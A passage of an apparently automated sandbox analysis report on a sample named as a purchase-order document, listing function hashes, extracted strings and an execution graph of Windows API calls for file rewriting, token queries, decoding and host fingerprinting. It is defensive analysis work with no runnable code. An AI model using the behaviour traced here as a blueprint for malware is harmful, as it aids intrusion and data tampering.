                                                                                                                                                                      • Instruction ID: ff82ca6e7f56a33c4b920b96401b72bb604fa9c74a3eb487e7346cfc03e5468e
                                                                                                                                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                      • Instruction Fuzzy Hash: BC11B176504240DFDB15CF54D5C4B16FFB2FB84324F28C6A9D8490B696C33AE456CBA2
                                                                                                                                                                      Function 0300D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1419032279.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_300d000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                      • Instruction ID: d5461fb9015f761211dc278cb3e4b935f400af674954926584659597ac063175
                                                                                                                                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                      • Instruction Fuzzy Hash: AA11D376504280CFDB15CF54D5C4B16BFB2FB88324F28C6A9DC490B696C336D45ACBA2
                                                                                                                                                                      Function 0301D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1419351532.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_301d000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                                                                                      • Instruction ID: 30956e1550d8f335a7e23de099815a48236b44264a711158a5fbf8c9566b60e8
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                                                                                      • Instruction Fuzzy Hash: 5711DD75504280DFCB05CF14C5C0B25FBB2FB84324F28C6ADD8494B696C33AD41ACB61
                                                                                                                                                                      Function 0300D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1419032279.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_300d000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 50769e4aec267f30b03ceb5e291d77b05928b543db7c1697a685d6c69f1e0539
                                                                                                                                                                      • Instruction ID: bd65ca078ece470e4767ea62a0c3cc46097af349a720c0101fead6fe11cd6d71
                                                                                                                                                                      • Opcode Fuzzy Hash: 50769e4aec267f30b03ceb5e291d77b05928b543db7c1697a685d6c69f1e0539
                                                                                                                                                                      • Instruction Fuzzy Hash: 3901F7311093449AF7209A95CC84B2BFBDCDF41235F08C95AED0C0A2C2E6399845CAB2
                                                                                                                                                                      Function 0300D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1419032279.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_300d000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: dfec921a8667073d0356b4748974c712bf4ae07de45a8e8f869392c310afbe39
                                                                                                                                                                      • Instruction ID: 20836897613404f3bcae72e25011fa3047e4367157a9853efc250d97137b9029
                                                                                                                                                                      • Opcode Fuzzy Hash: dfec921a8667073d0356b4748974c712bf4ae07de45a8e8f869392c310afbe39
                                                                                                                                                                      • Instruction Fuzzy Hash: 65F0C232005344AEE7109E56C888B67FFECEB81234F18C55AED0C0A2C6D2799844CBB1

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 0B500040 Relevance: 7.3, Strings: 5, Instructions: 1028COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'q$TJq$Teq$pq$xbq
                                                                                                                                                                      • API String ID: 0-4142780942
                                                                                                                                                                      • Opcode ID: 5b2294d31e22e43611d592ded334b6d7b334fce45922172648457ff9db9b8bb5
                                                                                                                                                                      • Instruction ID: 803cfd5e75d6e1cdaff0eebc297c091718cf1aada834b9c23d3ba3867aa37b7b
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b2294d31e22e43611d592ded334b6d7b334fce45922172648457ff9db9b8bb5
                                                                                                                                                                      • Instruction Fuzzy Hash: 1CB2BF74E00628CFDB65CF69C984BD9BBB2BF89304F1581E9D509AB265DB319E81CF40
                                                                                                                                                                      Function 0B500006 Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: TJq$Teq$xbq
                                                                                                                                                                      • API String ID: 0-4091408781
                                                                                                                                                                      • Opcode ID: a96aa8231baa18dcffda35cd930618be3304c3dab509cdffcbf4607000ada4c7
                                                                                                                                                                      • Instruction ID: 4bb23161003c189731160d3ec9c9c74478f5885bb510d2177726deed90dcfde7
                                                                                                                                                                      • Opcode Fuzzy Hash: a96aa8231baa18dcffda35cd930618be3304c3dab509cdffcbf4607000ada4c7
                                                                                                                                                                      • Instruction Fuzzy Hash: 19C1C275E016588FDB59CF6AC944AD9BBF2BF89300F14C1EAD408AB365DB305A85CF50
                                                                                                                                                                      Function 05703733 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: CB7
                                                                                                                                                                      • API String ID: 0-594655847
                                                                                                                                                                      • Opcode ID: a738c4353ea0da7288b5355f9c4a410a0db8be56a42ad16967b60b8aea0d6eb9
                                                                                                                                                                      • Instruction ID: ea85fd8a7f68493ed4f014f26c7146b63dd649de2b709f406ee863e1a6e281b0
                                                                                                                                                                      • Opcode Fuzzy Hash: a738c4353ea0da7288b5355f9c4a410a0db8be56a42ad16967b60b8aea0d6eb9
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E41B075F2420ACFCB44CB6CC9815BEB7F2BB88300F15A966D415EB391D634D9019B91
                                                                                                                                                                      Function 05703740 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: CB7
                                                                                                                                                                      • API String ID: 0-594655847
                                                                                                                                                                      • Opcode ID: 9f9f21e23dbd0906bb319e1a55495752d9f8887466afad34edf8cc07c977f1e5
                                                                                                                                                                      • Instruction ID: 103771460c6d231393ecf4d6cac1e72bafb3c681ae43d1be1430733481c0bc81
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f9f21e23dbd0906bb319e1a55495752d9f8887466afad34edf8cc07c977f1e5
                                                                                                                                                                      • Instruction Fuzzy Hash: 9431DDB5F2021ACFCB44CF6CC9815AEBBF6BB88310F14A866D415EB391D630DD019B91
                                                                                                                                                                      Function 0B50AB40 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a8d58085805926972231e3c7aa3d0b6ceeea81bbc2f4e0077c4a4f731ed2d28b
                                                                                                                                                                      • Instruction ID: 674da2eb90660d2231be313f690a5049c9348e9723bbea5a114dd278918f19bb
                                                                                                                                                                      • Opcode Fuzzy Hash: a8d58085805926972231e3c7aa3d0b6ceeea81bbc2f4e0077c4a4f731ed2d28b
                                                                                                                                                                      • Instruction Fuzzy Hash: 98E1FC74E102598FDB14CFA9C5809AEFBB2FF89304F248169D415AB395DB35AD42CF60
                                                                                                                                                                      Function 0B509E98 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f74034669a98ad8d38def81d084f53d166ed12e4b17280a29512cb636f29702e
                                                                                                                                                                      • Instruction ID: 0c1d46da324f0e691d42b2a3b51a624a4c7673fa430e6415952e2b6ba27d6e86
                                                                                                                                                                      • Opcode Fuzzy Hash: f74034669a98ad8d38def81d084f53d166ed12e4b17280a29512cb636f29702e
                                                                                                                                                                      • Instruction Fuzzy Hash: 07E1FB74E102198FDB14CFA9C580AAEFBB2FF89304F248169D455AB395DB35AD42CF60
                                                                                                                                                                      Function 0B50BDE0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 33b61bff8ad4c31de4d37f89ed4b25858c2356506140f667039eb029a03d6c7a
                                                                                                                                                                      • Instruction ID: 5f851bb1b1a25532ec1b168676411b5b40976d155468795b707409f7040167fa
                                                                                                                                                                      • Opcode Fuzzy Hash: 33b61bff8ad4c31de4d37f89ed4b25858c2356506140f667039eb029a03d6c7a
                                                                                                                                                                      • Instruction Fuzzy Hash: 87E10C74E102598FDB14CFA9C580AAEFBB2FF49304F2481A9D415AB395DB31AD42CF60
                                                                                                                                                                      Function 0B50A2D0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4da7c0d25951a8c3d7768c2c3868c52fe3b93eb6c697b09a7fb872502a4d5cf8
                                                                                                                                                                      • Instruction ID: 80db13ed1b16c78d081cb97b8942d3108f8c8d1308b60c7bb9f7d02cfad10531
                                                                                                                                                                      • Opcode Fuzzy Hash: 4da7c0d25951a8c3d7768c2c3868c52fe3b93eb6c697b09a7fb872502a4d5cf8
                                                                                                                                                                      • Instruction Fuzzy Hash: A2E1EB74E102198FDB14DFA9C580AAEFBB2FF89304F248169D415AB395DB35AD42CF60
                                                                                                                                                                      Function 0B50A708 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 505074b5890906e012592cf798316f40d86d76426a16dfe7f40ef7433569d0fc
                                                                                                                                                                      • Instruction ID: 7b62dc2dbe5ae3adfea6a12263b6bc7dadba6e9d7be3c7d0744426391e251d48
                                                                                                                                                                      • Opcode Fuzzy Hash: 505074b5890906e012592cf798316f40d86d76426a16dfe7f40ef7433569d0fc
                                                                                                                                                                      • Instruction Fuzzy Hash: 86E1EC74E102198FDB14DFA9C580AAEFBB2FF89304F2481A9D415A7395DB35AD42CF60
                                                                                                                                                                      Function 0B50BDCF Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d266e073e9c962b22a9785cad2e0b8b38428f99e3e56b610f4ed9683c118c82b
                                                                                                                                                                      • Instruction ID: b163dbe1d2129245df788f0b92fd9814d51a3191309bf7bb2c4dd14cc99c5943
                                                                                                                                                                      • Opcode Fuzzy Hash: d266e073e9c962b22a9785cad2e0b8b38428f99e3e56b610f4ed9683c118c82b
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D51EA74E102198BDB14CFA9C5815AEBBF2FF89304F2481A9D418A7355DB359D42CF61
                                                                                                                                                                      Function 0B50AB30 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1827b66b2f96634c6f6579474938deab1a4ef34180e352b959fe369a43f739ad
                                                                                                                                                                      • Instruction ID: 2743b4b5cb92ce87ca007afc4d393293cbf0c989175905ce0be3724e5c026b1c
                                                                                                                                                                      • Opcode Fuzzy Hash: 1827b66b2f96634c6f6579474938deab1a4ef34180e352b959fe369a43f739ad
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F512974E102198BDB14CFA9C5806AEFBF2FF89300F2481A9D418A7355DB31AD42CFA1
                                                                                                                                                                      Function 0B50A2C0 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6f37d36ed07ecb98d4ea9671748d70c8249ddd70021d750b162f70ace60cfb83
                                                                                                                                                                      • Instruction ID: 01b13dd1ff747c724b2149132609ce88f5c9bfb2da0d5735b93a7400565d51fe
                                                                                                                                                                      • Opcode Fuzzy Hash: 6f37d36ed07ecb98d4ea9671748d70c8249ddd70021d750b162f70ace60cfb83
                                                                                                                                                                      • Instruction Fuzzy Hash: B1511874E102198FDB14CFA9C5805AEBBF2FF89300F2481A9D418AB356DB359E42CF61

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:5%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:13.3%
                                                                                                                                                                      Total number of Nodes:376
                                                                                                                                                                      Total number of Limit Nodes:65
                                                                                                                                                                      execution_graph 61531 f4aaf0 61532 f4ab06 61531->61532 61536 f4abbf 61532->61536 61537 f46490 61532->61537 61534 f4ab20 61534->61536 61541 f45df0 61534->61541 61540 f45e10 61537->61540 61538 f46084 SetFilePointerEx 61538->61540 61539 f45d90 61539->61534 61539->61539 61540->61534 61540->61538 61540->61539 61544 f45e10 61541->61544 61542 f45d90 61542->61536 61543 f46084 SetFilePointerEx 61543->61544 61544->61536 61544->61542 61544->61543 61545 f44b70 GetUserDefaultUILanguage 61546 f44b82 61545->61546 61547 f48431 61548 f48439 61547->61548 61557 f4829d 61547->61557 61549 f482ef GetTokenInformation 61549->61557 61550 f48376 GetTokenInformation 61551 f48380 GetLastError 61550->61551 61550->61557 61553 f4838f OpenProcessToken 61551->61553 61552 f47e76 CryptStringToBinaryA 61559 f47e89 61552->61559 61554 f483d3 GetSidSubAuthorityCount 61554->61557 61555 f4839e CloseHandle 61555->61557 61556 f48414 61556->61553 61557->61549 61557->61550 61557->61552 61557->61554 61557->61555 61557->61556 61563 f45d90 61557->61563 61566 f51e6c 61557->61566 61558 f47f06 CryptStringToBinaryA 61558->61559 61559->61558 61561 f45e10 61559->61561 61559->61563 61560 f46084 SetFilePointerEx 61560->61561 61561->61560 61561->61563 61566->61563 61567 f45d20 61566->61567 61573 f534d2 VirtualFree SetFilePointerEx 61566->61573 61574 f534d2 VirtualAlloc VirtualFree SetFilePointerEx 61566->61574 61569 f45d22 61567->61569 61568 f45d39 VirtualAlloc 61568->61569 61569->61566 61569->61568 61570 f45d46 61569->61570 61572 f45d5d VirtualFree 61569->61572 61572->61566 61573->61566 61574->61566 61575 f4e2f8 61576 f4e305 61575->61576 61577 f4e34e FindClose 61575->61577 61576->61577 61578 f4dbe7 61576->61578 61579 f4ddea 61577->61579 61580 f49cb9 61581 f49881 ReadFile 61580->61581 61582 f49cc1 61580->61582 61583 f49890 61581->61583 61582->61581 61584 f49cc7 61582->61584 61585 f4c87b 61590 f4beda 61585->61590 61586 f4c65a ReadFile 61586->61590 61587 f4b5f3 SetFilePointerEx 61591 f48645 61587->61591 61592 f4b613 61587->61592 61588 f4b617 61589 f4b770 ReadFile 61589->61591 61589->61592 61590->61586 61590->61587 61590->61591 61592->61588 61592->61589 61593 f45a3b 61594 f45a45 61593->61594 61599 f44f7c 61593->61599 61595 f451ae 61594->61595 61596 f45a4b CreateThread 61594->61596 61597 f45a59 RtlExitUserThread 61596->61597 61603 f45b1d 61597->61603 61598 f44f88 61599->61598 61600 f45d20 2 API calls 61599->61600 61602 f44f99 61600->61602 61604 f45d20 2 API calls 61603->61604 61605 f45b3c 61604->61605 61606 f4d624 61607 f4d788 SetFileTime 61606->61607 61608 f4d62b 61606->61608 61621 f4cc9b 61607->61621 61608->61607 61608->61621 61609 f4d729 GetFileSizeEx 61612 f4d8a1 CloseHandle 61609->61612 61609->61621 61610 f4d378 CloseHandle 61610->61621 61611 f4cd5c lstrcmpiW 61611->61621 61614 f4d426 61612->61614 61612->61621 61613 f4d42a CloseHandle 61613->61614 61613->61621 61614->61612 61614->61613 61616 f4d43c 61614->61616 61614->61621 61615 f4d049 SetFilePointerEx 61615->61621 61617 f4d5c5 CreateFileW 61617->61621 61620 f45d20 VirtualAlloc VirtualFree 61620->61621 61621->61609 61621->61610 61621->61611 61621->61612 61621->61613 61621->61614 61621->61615 61621->61617 61621->61620 61622 f4cc92 61621->61622 61623 f4cca0 lstrcmpiW 61621->61623 61624 f4cfbb GetFileTime 61621->61624 61625 f48937 VirtualAlloc VirtualFree 61621->61625 61626 f48470 VirtualAlloc VirtualFree 61621->61626 61623->61621 61624->61621 61625->61621 61627 f497a7 61628 f497ad 61627->61628 61629 f498be GetFileSize 61628->61629 61637 f484ad 61628->61637 61630 f49bfb 61629->61630 61632 f498de 61630->61632 61636 f48e26 61630->61636 61634 f48920 61632->61634 61651 f45f10 61632->61651 61633 f49aea 61636->61637 61638 f4b180 61636->61638 61647 f4b0de 61638->61647 61639 f4b2a7 SetFilePointerEx 61640 f4b1df 61639->61640 61645 f4b1c6 61639->61645 61640->61636 61641 f4b196 61642 f4b3a6 61641->61642 61641->61645 61643 f4b3b2 61642->61643 61644 f4b328 SetFilePointerEx 61642->61644 61643->61636 61644->61636 61645->61640 61646 f4b2e0 WriteFile 61645->61646 61646->61636 61647->61638 61647->61639 61647->61641 61647->61644 61648 f4b253 61647->61648 61649 f4b0d0 SetFilePointerEx 61647->61649 61648->61636 61649->61647 61650 f4b054 61649->61650 61650->61636 61653 f45e10 61651->61653 61652 f46084 SetFilePointerEx 61652->61653 61653->61633 61653->61651 61653->61652 61654 f45d90 61653->61654 61654->61633 61655 f4bf27 61656 f4c0de 61655->61656 61657 f4b9bb ReadFile 61656->61657 61659 f489ba 61656->61659 61661 f489bd 61656->61661 61665 f4bc07 61657->61665 61670 f4b9ee 61657->61670 61660 f45d20 2 API calls 61660->61661 61661->61659 61661->61660 61662 f4bd43 SetFilePointerEx 61664 f4bd68 61662->61664 61663 f4bafa 61665->61663 61666 f4bdd0 61665->61666 61669 f4a7d8 61665->61669 61667 f4bdd4 SetFilePointerEx 61666->61667 61666->61670 61667->61666 61668 f4a9a0 GetFileSize 61668->61669 61677 f484ad 61668->61677 61669->61668 61673 f49ad5 61669->61673 61676 f48e26 61669->61676 61669->61677 61670->61662 61671 f4be1c 61670->61671 61672 f4b180 4 API calls 61672->61676 61674 f45f10 SetFilePointerEx 61673->61674 61673->61677 61675 f49aea 61674->61675 61676->61672 61676->61677 61678 f4a5e0 SetFilePointerEx 61679 f4a547 61678->61679 61679->61678 61680 f4f260 SetFilePointerEx 61681 70bf790 61682 70bf7d4 CloseHandle 61681->61682 61684 70bf820 61682->61684 61685 f4ee68 61687 f4ee72 61685->61687 61688 f4ec8c 61685->61688 61686 f4f7c1 WriteFile 61686->61688 61687->61686 61687->61688 61689 f4bfd5 61690 f4c14b ReadFile 61689->61690 61691 f4bd9a 61689->61691 61692 f4a071 61691->61692 61693 f4bdd0 61691->61693 61700 f4a7d8 61691->61700 61694 f4bdd4 SetFilePointerEx 61693->61694 61697 f4b9fe 61693->61697 61694->61693 61695 f4a9a0 GetFileSize 61695->61700 61705 f484ad 61695->61705 61696 f4be1c 61697->61696 61698 f4bd43 SetFilePointerEx 61697->61698 61699 f4bd68 61698->61699 61700->61695 61701 f49ad5 61700->61701 61700->61705 61706 f48e26 61700->61706 61703 f45f10 SetFilePointerEx 61701->61703 61701->61705 61702 f4b180 4 API calls 61702->61706 61704 f49aea 61703->61704 61706->61702 61706->61705 61707 f49216 61709 f48e26 61707->61709 61708 f4b180 4 API calls 61708->61709 61709->61708 61710 f484ad 61709->61710 61711 f45d50 61712 f45d52 VirtualFree 61711->61712 61714 f4f6d1 SetFilePointerEx 61716 f4e590 61714->61716 61715 f4e59e SetFilePointerEx 61715->61716 61716->61715 61717 f4e6ed 61716->61717 61718 f4e539 61716->61718 61720 f4e7ac SetFilePointerEx 61716->61720 61719 f45f10 SetFilePointerEx 61717->61719 61721 f4e70a 61719->61721 61720->61716 61722 f4ec9d 61727 f4ea10 61722->61727 61732 f4ec8c 61722->61732 61723 f4e6ed 61725 f45f10 SetFilePointerEx 61723->61725 61724 f4f8d4 SetFilePointerEx 61724->61727 61728 f4e70a 61725->61728 61726 f4e7ac SetFilePointerEx 61731 f4e590 61726->61731 61727->61724 61727->61731 61727->61732 61729 f4e59e SetFilePointerEx 61729->61731 61730 f4e539 61731->61723 61731->61726 61731->61729 61731->61730 61733 f4d51e 61734 f4d3d1 ReadFile 61733->61734 61736 f4cf80 61733->61736 61738 f4cc9b 61734->61738 61735 f4d42a CloseHandle 61735->61738 61751 f4d426 61735->61751 61736->61734 61736->61738 61737 f4d43c 61738->61735 61740 f4cc92 61738->61740 61741 f4d729 GetFileSizeEx 61738->61741 61742 f4d049 SetFilePointerEx 61738->61742 61743 f4d8a1 CloseHandle 61738->61743 61744 f4cfbb GetFileTime 61738->61744 61745 f4d5c5 CreateFileW 61738->61745 61747 f4cd5c lstrcmpiW 61738->61747 61748 f45d20 VirtualAlloc VirtualFree 61738->61748 61749 f4cca0 lstrcmpiW 61738->61749 61750 f4d378 CloseHandle 61738->61750 61738->61751 61752 f48937 VirtualAlloc VirtualFree 61738->61752 61753 f48470 VirtualAlloc VirtualFree 61738->61753 61741->61738 61741->61743 61742->61738 61743->61738 61743->61751 61744->61738 61745->61738 61747->61738 61748->61738 61749->61738 61750->61738 61751->61735 61751->61737 61751->61738 61751->61743 61752->61738 61754 f4b09f 61762 f4ae43 61754->61762 61755 f4b07b SetFilePointerEx 61755->61762 61756 f4b028 61758 f4b03c WriteFile 61756->61758 61757 f489ba 61759 f45d20 2 API calls 61760 f484e6 61759->61760 61760->61757 61760->61759 61761 f4b180 4 API calls 61764 f48e26 61761->61764 61762->61755 61762->61756 61762->61758 61762->61760 61763 f4b01c 61762->61763 61762->61764 61767 f4a1a2 61762->61767 61771 f484ad 61762->61771 61763->61756 61763->61764 61765 f48b7b 61763->61765 61764->61761 61764->61771 61766 f4a9a0 GetFileSize 61766->61767 61766->61771 61767->61764 61767->61766 61768 f49ad5 61767->61768 61767->61771 61769 f45f10 SetFilePointerEx 61768->61769 61768->61771 61770 f49aea 61769->61770 61772 f49a85 61773 f49aa3 61772->61773 61774 f49a2d SetFilePointerEx 61772->61774 61773->61774 61775 f49aa5 61773->61775 61776 f45085 61777 f4506f 61776->61777 61778 f45089 61776->61778 61781 f68550 61777->61781 61780 f45078 61802 f68556 61781->61802 61782 f6855c 61788 f68568 61782->61788 61800 f67dd7 61782->61800 61783 f68145 GetLastError 61783->61800 61784 f68bc1 GetLastError 61784->61802 61785 f68986 SetEntriesInAclW 61785->61802 61786 f683fb GetUserNameW 61786->61800 61787 f68209 GetUserNameW 61787->61800 61806 f67d37 61787->61806 61789 f6896a wsprintfW 61788->61789 61799 f67d30 61788->61799 61789->61799 61790 f689cd OpenMutexW 61790->61780 61791 f68248 61793 f6824a GetLastError 61791->61793 61793->61780 61794 f6836e GetLastError 61794->61800 61795 f67d6c GetVolumeInformationW 61795->61780 61796 f67d20 61796->61795 61797 f67d83 GetWindowsDirectoryW 61796->61797 61796->61799 61803 f67e06 GetComputerNameW 61796->61803 61796->61806 61797->61799 61797->61806 61798 f67fd4 GetLastError 61798->61800 61799->61795 61799->61806 61800->61783 61800->61786 61800->61787 61800->61791 61800->61793 61800->61794 61800->61795 61800->61796 61800->61798 61800->61799 61805 